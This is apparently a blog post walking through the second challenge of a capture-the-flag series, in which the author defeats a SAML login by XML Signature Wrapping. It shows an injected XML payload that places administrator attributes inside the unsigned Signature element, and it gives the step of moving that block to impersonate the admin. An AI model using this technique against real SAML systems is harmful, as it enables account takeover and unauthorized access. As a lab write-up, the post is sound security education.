Abaga CTF 2/4 – ambarinn

This post is a part of the series Ambaga CTF challenge which involves four puzzles to solve aka hack. The secound challenge is the bar ambarinn. Lets get hacking 🧑‍💻

Welcome to ambakari

If you are wondering what this is all about check out my previous post on this CTF challenge.

Ambarinn is famous for a specific cocktail, but its only available to select few. All we know is that Adminmann is a part of that exclusive group.

Recon

The recon steps are basically the same for all of these challenges so check out ambakari for the recon.

Spoiler Alert!

I’ve made following collapsible so you don’t see anything accidentally. If you plan to do the challenge, look away now and come back when you’re done. Or, if you get stuck, you can always take a peek… I won’t tell! 🙊

🔓 My Solutions 🔓

To begin with I’ve gone through tools and such in ambakari so please read that first so this makes sense.

Lets begin, it is the same login form and basically the same overview screen we get after loging into ambarinn. It has the secret cocktail but we can’t see it cause we are not administer. What are we to do?

So first we would just try the same method as before but we find out that signature is most definitely required. as we get the error message “Authentication error: Expected to find XML element Signature in {urn:oasis:names:tc:SAML:2.0:protocol}Response”

So Signature is needed and we can’t mess with the message cause if we change that then the signature will not match. But take special note that the Signature is not a part of what is signed, so anything in there iss up for grabs, introducing Signature Wrapping (SW) vulnerability. So we might try just putting the user info in the signature between </KeyInfo> and </Signature> and send it off

XML

...</KeyInfo>
<Attribute Name="UserSSN" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" FriendlyName="Kennitala">
            <AttributeValue xsi:type="xsd:string">9876543210</AttributeValue>
        </Attribute>
        <Attribute Name="Name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" FriendlyName="Nafn">
            <AttributeValue xsi:type="xsd:string">Adminmann Adminmannsson</AttributeValue>
        </Attribute>
 </Signature>...

...</KeyInfo>
<Attribute Name="UserSSN" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" FriendlyName="Kennitala">
            <AttributeValue xsi:type="xsd:string">9876543210</AttributeValue>
        </Attribute>
        <Attribute Name="Name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" FriendlyName="Nafn">
            <AttributeValue xsi:type="xsd:string">Adminmann Adminmannsson</AttributeValue>
        </Attribute>
 </Signature>...

That goes through but we are still logged in as Testmann. This is because it found the UserSSN before it got to the signature part of the XML. How can we fix that? Well <Signature> does not have to be at the bottom. We can move <Signature> … </Signature> as a whole and put it in between <Response> and <Issuer>.

Then we can send it off again

We did it, we are in! 🍸 ⛳️ ✅
Just look at the delicious looking cocktail and our flag that we can use to mark the challenge as completed. If you want to see it yourself you will just have to do the challenge 😉